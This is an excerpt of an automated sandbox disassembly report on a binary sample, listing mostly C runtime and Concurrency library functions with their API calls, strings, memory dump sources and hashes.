                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1DF13
                                                                                                        • DName::operator+.LIBCMT ref: 00B1DF22
                                                                                                        • DName::operator+.LIBCMT ref: 00B1DF30
                                                                                                        • _HeapManager::getMemory.LIBVCRUNTIME ref: 00B1DF48
                                                                                                        • operator+.LIBVCRUNTIME ref: 00B1E07C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Name::operator+$NameName::$Decorator::get$Type$This$DataHeapIndirectManager::getMemoryName::operator+=Name::operator|=Scopeoperator+
                                                                                                        • String ID:
                                                                                                        • API String ID: 1537886362-0
                                                                                                        • Opcode ID: f480cf226f3b2eae215447235a956f3e8f86eb56afeecb1f1fe61d2c0c462261
                                                                                                        • Instruction ID: 46da0faff94d601da7d23c3aa758f31533fc8893c16fe80a303eec38d1fa7607
                                                                                                        • Opcode Fuzzy Hash: f480cf226f3b2eae215447235a956f3e8f86eb56afeecb1f1fe61d2c0c462261
                                                                                                        • Instruction Fuzzy Hash: 53C12271D00209AFCB08DBA8D895DEEB7F5EF19300F9081A9E526E7291DF749A85CB50
                                                                                                        Function 00B00623 Relevance: 29.8, APIs: 12, Strings: 5, Instructions: 86libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00B987E8,00000FA0,AE695AF0,?,?,?,?,00B4EEC0,000000FF), ref: 00B00652
                                                                                                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00B4EEC0,000000FF), ref: 00B0065D
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00B4EEC0,000000FF), ref: 00B0066E
                                                                                                        • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00B00684
                                                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00B00692
                                                                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00B006A0
                                                                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B006CB
                                                                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B006D6
                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,00B4EEC0,000000FF), ref: 00B006F9
                                                                                                        • ___scrt_fastfail.LIBCMT ref: 00B0070A
                                                                                                        • DeleteCriticalSection.KERNEL32(00B987E8,00000007,?,?,?,?,00B4EEC0,000000FF), ref: 00B00715
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00B4EEC0,000000FF), ref: 00B00725
                                                                                                        Strings
                                                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B00658
                                                                                                        • InitializeConditionVariable, xrefs: 00B0067E
                                                                                                        • SleepConditionVariableCS, xrefs: 00B0068A
                                                                                                        • kernel32.dll, xrefs: 00B00669
                                                                                                        • WakeAllConditionVariable, xrefs: 00B00698
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleProc$CriticalModuleSection__crt_fast_encode_pointer$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                                                                                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                        • API String ID: 2634751764-1714406822
                                                                                                        • Opcode ID: 9c96b3cbae99b7f033206a1828fb4437148229a49e660b071972067327906676
                                                                                                        • Instruction ID: 070f2de5612ffc88a580df7d1476f3cb2bc9e8bd3f337a0f1e3655506c7ec946
                                                                                                        • Opcode Fuzzy Hash: 9c96b3cbae99b7f033206a1828fb4437148229a49e660b071972067327906676
                                                                                                        • Instruction Fuzzy Hash: D621B531650711ABD7116F74AD99B667BE9DB46F92F0401E5F901E33E0DE758C008A64
                                                                                                        Function 00B1E8CA Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 155COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • UnDecorator::getBasicDataType.LIBVCRUNTIME ref: 00B1E901
                                                                                                        • DName::operator=.LIBVCRUNTIME ref: 00B1E912
                                                                                                        • DName::operator+=.LIBCMT ref: 00B1E920
                                                                                                        • UnDecorator::getPtrRefType.LIBCMT ref: 00B1E952
                                                                                                        • operator+.LIBVCRUNTIME ref: 00B1E973
                                                                                                        • UnDecorator::getDataIndirectType.LIBVCRUNTIME ref: 00B1E9D0
                                                                                                        • UnDecorator::getBasicDataType.LIBVCRUNTIME ref: 00B1E9D9
                                                                                                        • UnDecorator::getPtrRefDataType.LIBVCRUNTIME ref: 00B1E9F1
                                                                                                        • UnDecorator::getScopedName.LIBVCRUNTIME ref: 00B1EA2D
                                                                                                        • operator+.LIBVCRUNTIME ref: 00B1EA4E
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1EA60
                                                                                                        • DName::operator=.LIBVCRUNTIME ref: 00B1EA8B
                                                                                                        • DName::operator+=.LIBCMT ref: 00B1EA99
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Decorator::get$Type$Data$BasicNameName::operator+=Name::operator=operator+$IndirectName::Scoped
                                                                                                        • String ID: std::nullptr_t$std::nullptr_t $volatile
                                                                                                        • API String ID: 2673590388-294867888
                                                                                                        • Opcode ID: 8906340a44d863708853d57ed96ebdc8e3e325c16791f17abb4cd133672eb579
                                                                                                        • Instruction ID: 22cc3cd4c6a43490c0227e1dd6e498a50e310ba05b2bc6273bf170349e7bf63c
                                                                                                        • Opcode Fuzzy Hash: 8906340a44d863708853d57ed96ebdc8e3e325c16791f17abb4cd133672eb579
                                                                                                        • Instruction Fuzzy Hash: 9751B371804205EECB11DF28C9859E9BFF6FF06340B9441DAF815A7261EB32DAC5CB60
                                                                                                        Function 00B2CC29 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$Info
                                                                                                        • String ID:
                                                                                                        • API String ID: 2509303402-0
                                                                                                        • Opcode ID: 51e2b2bedafe23d6292229a0883f1cff7ff20588cc6feef98feef105e40cf9e6
                                                                                                        • Instruction ID: 2b9bbd1643dcd9b2e6c7acdff8bc6c97a4edbc8d1e06e94b8687193549136037
                                                                                                        • Opcode Fuzzy Hash: 51e2b2bedafe23d6292229a0883f1cff7ff20588cc6feef98feef105e40cf9e6
                                                                                                        • Instruction Fuzzy Hash: 2DB1BD71D00205AFDB21DF68C881BEEBBF5FF09300F2441AAF599A7252DB75A945CB60
                                                                                                        Function 00B3DAF8 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___free_lconv_mon.LIBCMT ref: 00B3DB3C
                                                                                                          • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CEA8
                                                                                                          • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CEBA
                                                                                                          • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CECC
                                                                                                          • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CEDE
                                                                                                          • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CEF0
                                                                                                          • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CF02
                                                                                                          • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CF14
                                                                                                          • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CF26
                                                                                                          • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CF38
                                                                                                          • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CF4A
                                                                                                          • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CF5C
                                                                                                          • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CF6E
                                                                                                          • Part of subcall function 00B3CE8B: _free.LIBCMT ref: 00B3CF80
                                                                                                        • _free.LIBCMT ref: 00B3DB31
                                                                                                          • Part of subcall function 00B34D66: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?), ref: 00B34D7C
                                                                                                          • Part of subcall function 00B34D66: GetLastError.KERNEL32(?,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?,?), ref: 00B34D8E
                                                                                                        • _free.LIBCMT ref: 00B3DB53
                                                                                                        • _free.LIBCMT ref: 00B3DB68
                                                                                                        • _free.LIBCMT ref: 00B3DB73
                                                                                                        • _free.LIBCMT ref: 00B3DB95
                                                                                                        • _free.LIBCMT ref: 00B3DBA8
                                                                                                        • _free.LIBCMT ref: 00B3DBB6
                                                                                                        • _free.LIBCMT ref: 00B3DBC1
                                                                                                        • _free.LIBCMT ref: 00B3DBF9
                                                                                                        • _free.LIBCMT ref: 00B3DC00
                                                                                                        • _free.LIBCMT ref: 00B3DC1D
                                                                                                        • _free.LIBCMT ref: 00B3DC35
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                        • String ID:
                                                                                                        • API String ID: 161543041-0
                                                                                                        • Opcode ID: e522930302b4c172d97c8d8265c8807d133ed583d29b623727b113237f4a7131
                                                                                                        • Instruction ID: 308840a702250b049491b4c138d2f6a940c6668a0839bd5fd2e0a42bc5429306
                                                                                                        • Opcode Fuzzy Hash: e522930302b4c172d97c8d8265c8807d133ed583d29b623727b113237f4a7131
                                                                                                        • Instruction Fuzzy Hash: B7314D71A00701AFEB31AA38E845B56B7E8EF41750F7548AAE058D7161EF75FD40CB20
                                                                                                        Function 00B3CF89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: 9a636746aca7a7735d22caa6d3980cd449850805908c40474791cf9cf04b8279
                                                                                                        • Instruction ID: 27de5441149c838930e24375bb1cbdc3b6251a71d135274057426c5039119b79
                                                                                                        • Opcode Fuzzy Hash: 9a636746aca7a7735d22caa6d3980cd449850805908c40474791cf9cf04b8279
                                                                                                        • Instruction Fuzzy Hash: E4C126B2D40205BBDB20DBA8DC82FDE77F8AF45710F2441A5FA45FB282D670AE418755
                                                                                                        Function 00AF195C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 78COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Maklocchr$GetcvtMaklocstr$GetvalsH_prolog3_
                                                                                                        • String ID: false$true
                                                                                                        • API String ID: 2593140031-2658103896
                                                                                                        • Opcode ID: 920de3c1debbacfaa8f5a3d18969668429b2be8b756def944e92fe36a6e2c16b
                                                                                                        • Instruction ID: 0592cba98f8db4711e1c9bd6f94ef11aa05c9e3382963095a74d9895d89da44b
                                                                                                        • Opcode Fuzzy Hash: 920de3c1debbacfaa8f5a3d18969668429b2be8b756def944e92fe36a6e2c16b
                                                                                                        • Instruction Fuzzy Hash: 862192B2D00348AADF14EFA5D885ADF7BB8EF14710F048456F9199F242EB709944CBE1
                                                                                                        Function 00B1A5D6 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 00B1A6D1
                                                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 00B1A803
                                                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 00B1A8CD
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B1A92B
                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00B1A94F
                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 00B1A96A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionSpec$CallException@8FramesMatchNestedThrowTypeUnexpectedUnwind
                                                                                                        • String ID: csm$csm$csm
                                                                                                        • API String ID: 2291861386-393685449
                                                                                                        • Opcode ID: 40d2157cd318c55b326ce881c26910789badc758616dbba4f76e614181c5ea8b
                                                                                                        • Instruction ID: f6e89644befcf27d04650353a481a490dda2238d8c46dd1d9be0680edc5eabec
                                                                                                        • Opcode Fuzzy Hash: 40d2157cd318c55b326ce881c26910789badc758616dbba4f76e614181c5ea8b
                                                                                                        • Instruction Fuzzy Hash: 4BB149718012099FCF25DFA4C8819EEBBF9FF18310F95419AE8156B251D731EAD2CB92
                                                                                                        Function 00AD2730 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 179COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00AD0AE0: ___std_type_info_name.LIBVCRUNTIME ref: 00AD0B9E
                                                                                                          • Part of subcall function 00AD0AE0: ___std_type_info_name.LIBVCRUNTIME ref: 00AD0C09
                                                                                                        • ___std_type_info_name.LIBVCRUNTIME ref: 00AD27C4
                                                                                                          • Part of subcall function 00B17BC4: ___unDName.LIBVCRUNTIME ref: 00B17BF0
                                                                                                        • ___std_type_info_name.LIBVCRUNTIME ref: 00AD282E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___std_type_info_name$Name___un
                                                                                                        • String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent$ThisObject:
                                                                                                        • API String ID: 3683324773-4091968653
                                                                                                        • Opcode ID: 7d7228c8bd92c612d66a871353d1c2eacf5864c2e47b0e027daf64813759030d
                                                                                                        • Instruction ID: e9ba5194f8edb25d9e4a0917ad8ad788cac1b5a70aac8f45d15e0252eaf84974
                                                                                                        • Opcode Fuzzy Hash: 7d7228c8bd92c612d66a871353d1c2eacf5864c2e47b0e027daf64813759030d
                                                                                                        • Instruction Fuzzy Hash: D761D371604741AFC711AF34C95AB9BBBF4AF91300F004A6AF4965B3A1EB71D908CB92
                                                                                                        Function 00B0A00F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00B0A05B
                                                                                                        • SwitchToThread.KERNEL32(?), ref: 00B0A07E
                                                                                                        • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00B0A09D
                                                                                                        • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 00B0A0B9
                                                                                                        • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00B0A0C4
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B0A0EB
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B0A0F9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextException@8InternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadThrowstd::invalid_argument::invalid_argument
                                                                                                        • String ID: count$ppVirtualProcessorRoots
                                                                                                        • API String ID: 3409498682-3650809737
                                                                                                        • Opcode ID: 0f5bd9df816f843b85494532a0fca665e0066f91056e179403c704b5b6c047a9
                                                                                                        • Instruction ID: 99416cdb4ac70ba40d487f8313b2a6d97274838befd58bc4cfd2301e70e54413
                                                                                                        • Opcode Fuzzy Hash: 0f5bd9df816f843b85494532a0fca665e0066f91056e179403c704b5b6c047a9
                                                                                                        • Instruction Fuzzy Hash: 3C214F35A00309AFCB14EFA5C485AADBBF5FF49354F4044E9E902AB391DB30AE45CB51
                                                                                                        Function 00AF1A35 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 73COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: GetcvtMaklocchrMaklocstr$H_prolog3_
                                                                                                        • String ID: false$true
                                                                                                        • API String ID: 2216850052-2658103896
                                                                                                        • Opcode ID: 60ee497a4417e33ef676386ab07dedb29546e57c5c3b809f51d914e10fe623df
                                                                                                        • Instruction ID: 2fcb48075648da7cf2cf29513af08e37f05cecdebdda2fac0d55788f7aa3a336
                                                                                                        • Opcode Fuzzy Hash: 60ee497a4417e33ef676386ab07dedb29546e57c5c3b809f51d914e10fe623df
                                                                                                        • Instruction Fuzzy Hash: 672162B5D00348AADB14EFA6D98599FBBF8EF54700F00849AF9159F252EB70E540CB61
                                                                                                        Function 00B09AC7 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00B09AE1
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00B09AE9
                                                                                                        • DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 00B09AFE
                                                                                                        • SafeRWList.LIBCONCRT ref: 00B09B1E
                                                                                                          • Part of subcall function 00B07B1E: __EH_prolog3.LIBCMT ref: 00B07B25
                                                                                                          • Part of subcall function 00B07B1E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00B07B2F
                                                                                                          • Part of subcall function 00B07B1E: List.LIBCMT ref: 00B07B39
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B09B30
                                                                                                        • GetLastError.KERNEL32 ref: 00B09B3F
                                                                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B09B55
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B09B63
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
